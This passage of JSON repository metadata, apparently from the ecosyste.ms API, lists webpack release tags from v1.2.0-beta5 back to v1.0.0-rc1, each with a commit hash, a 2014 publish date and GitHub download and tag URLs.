published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v